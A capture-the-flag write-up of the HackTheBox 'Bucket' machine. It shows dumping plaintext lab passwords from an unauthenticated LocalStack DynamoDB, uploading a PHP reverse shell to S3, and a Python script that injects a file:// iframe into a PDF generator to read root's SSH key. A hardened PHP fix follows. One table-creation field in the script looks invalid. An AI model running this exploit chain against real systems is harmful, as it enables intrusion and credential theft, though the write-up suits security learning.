
HackTheBox: Bucket


User

Started by enumerating ports as always:

[jusepe@nix:~/Documents/HackTheBox/Bucket]$ sudo scan bucket.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,80
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 16
         Nmap: 9
         Total: 25

The first thing we see on the landing page is:
Landing page

If we take a look at where the images are being stored, they are served from http://s3.bucket.htb/adserver/images/, so the site is using S3 buckets as storage.
Since HTB machines run in an isolated lab without internet access, the box is probably using LocalStack, and I found this article on how to run aws-cli against LocalStack.

First we checked whether there is any data inside DynamoDB:

[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb dynamodb list-tables
TABLENAMES      users
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users
None    3       3
PASSWORD        Management@#1@#
USERNAME        Mgmt
PASSWORD        Welcome123!
USERNAME        Cloudadm
PASSWORD        n2vM-<_K_Q:.Aa2
USERNAME        Sysadm
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ 

Then we used the S3 bucket to upload a PHP reverse shell:

[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb s3 cp reverse.php s3://adserver
upload: ./reverse.php to s3://adserver/reverse.php             
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ curl http://bucket.htb/reverse.php

Now that we have a shell, we checked which users exist on the system; we can log in as roy with the last password from the DynamoDB dump.

Root

We checked for services listening on localhost and found what looks like a web server on port 8000:

roy@bucket:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:34825         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:4566          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   

Additionally, the source code under /var/www/html/bucket_app is readable by us, so we looked at what it does and found an interesting piece of functionality:

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}

It takes the data from the DynamoDB alerts table and renders it to a PDF, so we tested whether the HTML-to-PDF generator is vulnerable to SSRF / local file disclosure, following this guide. Then we wrote a Python script to automate creating the DynamoDB table, inserting the malicious alert, and retrieving the base64 of the file we want (root's id_rsa in this case).

#!/usr/bin/python3
import paramiko
import requests
import time

def upload_payload():
    # Create the 'alerts' table and insert one alert whose data is an iframe pointing at root's key.
    # The headers were captured from a real aws-cli request; LocalStack does not validate the
    # SigV4 signature, so the stale X-Amz-Date and Signature are accepted as-is.
    url = "http://s3.bucket.htb:80/"
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "X-Amz-Target": "DynamoDB_20120810.CreateTable",
        "Content-Type": "application/x-amz-json-1.0",
        "User-Agent": "aws-cli/1.18.135 Python/3.9.1 Linux/5.9.0-kali5-amd64 botocore/1.17.22",
        "X-Amz-Date": "20210106T123302Z",
        "Authorization": "AWS4-HMAC-SHA256 Credential=dr/20210106/us-east-1/dynamodb/aws4_request, SignedHeaders=content-type;host;x-amz-date;x-amz-target, Signature=62e9f6918cee6fd2b5b619f9d9f892661a086e1f7af77b5deb7b85b2308ef1b5",
        "Connection": "close",
    }
    body = {
        "AttributeDefinitions": [
            {"AttributeName": "title", "AttributeType": "S"},
            {"AttributeName": "data", "AttributeType": "S"},
        ],
        "KeySchema": [
            {"AttributeName": "title", "KeyType": "HASH"},
            {"AttributeName": "data", "KeyType": "S"},
        ],
        "ProvisionedThroughput": {"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
        "TableName": "alerts",
    }
    requests.post(url, headers=headers, json=body)

    # The title must be "Ransomware" to match the FilterExpression in the PHP code.
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "X-Amz-Target": "DynamoDB_20120810.PutItem",
        "Content-Type": "application/x-amz-json-1.0",
        "User-Agent": "aws-cli/1.18.135 Python/3.9.1 Linux/5.9.0-kali5-amd64 botocore/1.17.22",
        "X-Amz-Date": "20210106T123306Z",
        "Authorization": "AWS4-HMAC-SHA256 Credential=dr/20210106/us-east-1/dynamodb/aws4_request, SignedHeaders=content-type;host;x-amz-date;x-amz-target, Signature=9c0215d599c2d90f561635f299f5ef32875d34770434eaa856f02777eed31644",
        "Connection": "close",
    }
    body = {
        "Item": {
            "data": {"S": "<iframe src='file:///root/.ssh/id_rsa'></iframe>"},
            "title": {"S": "Ransomware"},
        },
        "TableName": "alerts",
    }
    requests.post(url, headers=headers, json=body)

def get_rsa_id():
    # SSH in as roy, trigger the PDF generation on the internal app and return result.pdf as one base64 line.
    hostname = "10.10.10.212"
    port = 22
    username = "roy"
    password = "n2vM-<_K_Q:.Aa2"

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.load_system_host_keys()
    try:
        client.connect(hostname, port=port, username=username, password=password)
        # Wait for the POST to finish; otherwise the cat below can run before pd4ml has written result.pdf.
        _, stdout, _ = client.exec_command('curl -X POST -d "action=get_alerts" http://localhost:8000')
        stdout.channel.recv_exit_status()
        _, stdout, _ = client.exec_command('cat /var/www/bucket-app/files/result.pdf | base64')
        output = stdout.read().decode('ascii')
        return "".join(output.split("\n"))
    finally:
        client.close()

if __name__ == "__main__":
    upload_payload()
    output = get_rsa_id()
    # Retry until result.pdf exists and is non-empty.
    while not output:
        time.sleep(2)
        output = get_rsa_id()
    print(output)

Finally we decode the base64 output and write the PDF:

[jusepe@nix:~/Documents/HackTheBox/Bucket/pwncat]$ python3 get_root_file.py | base64 -d > id_rsa.pdf
[jusepe@nix:~/Documents/HackTheBox/Bucket/pwncat]$ open id_rsa.pdf

Here is how the PDF looks:

id_rsa
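As an added example (not the box's own code), here is a hardened version of the get_alerts handler shown above. It keeps the same DynamoDbClient setup and pd4ml command line, and assumes each alert's data attribute is a DynamoDB string (`["S" => ...]`), which is what the PutItem above stores.

```php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;

// Added example, not the box's own code: hardened get_alerts handler.
if ($_SERVER["REQUEST_METHOD"] === "POST" && ($_POST["action"] ?? "") === "get_alerts") {
    date_default_timezone_set('America/New_York');
    $client = new DynamoDbClient([
        'profile'  => 'default',
        'region'   => 'us-east-1',
        'version'  => 'latest',
        'endpoint' => 'http://localhost:4566',
    ]);

    $iterator = $client->getIterator('Scan', [
        'TableName'                 => 'alerts',
        'FilterExpression'          => "title = :title",
        'ExpressionAttributeValues' => [":title" => ["S" => "Ransomware"]],
    ]);

    // Treat every alert's data as plain text. htmlspecialchars() turns an
    // injected <iframe src='file:///...'> into literal text, so the renderer
    // never follows file:// references taken from table contents.
    $html = "<html><body>";
    foreach ($iterator as $item) {
        $text = $item["data"]["S"] ?? '';   // assumption: data is a DynamoDB string
        $html .= "<p>" . htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "</p>\n";
    }
    $html .= "</body></html>";

    // Unguessable filename instead of rand(1,10000), and the path is
    // shell-escaped before it reaches passthru().
    $dir  = '/var/www/bucket-app/files/';
    $path = $dir . bin2hex(random_bytes(16)) . '.html';
    file_put_contents($path, $html);

    $cmd = "java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd "
         . escapeshellarg("file://" . $path) . " 800 A4 -out "
         . escapeshellarg($dir . "result.pdf");
    passthru($cmd);
    unlink($path);   // do not leave the intermediate HTML on disk
}
```

The other half of the fix is outside this file: the LocalStack DynamoDB endpoint on port 4566 is reachable through s3.bucket.htb without any credentials, which is what allowed the alerts table to be created and filled from the outside in the first place.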

Written by ITasahobby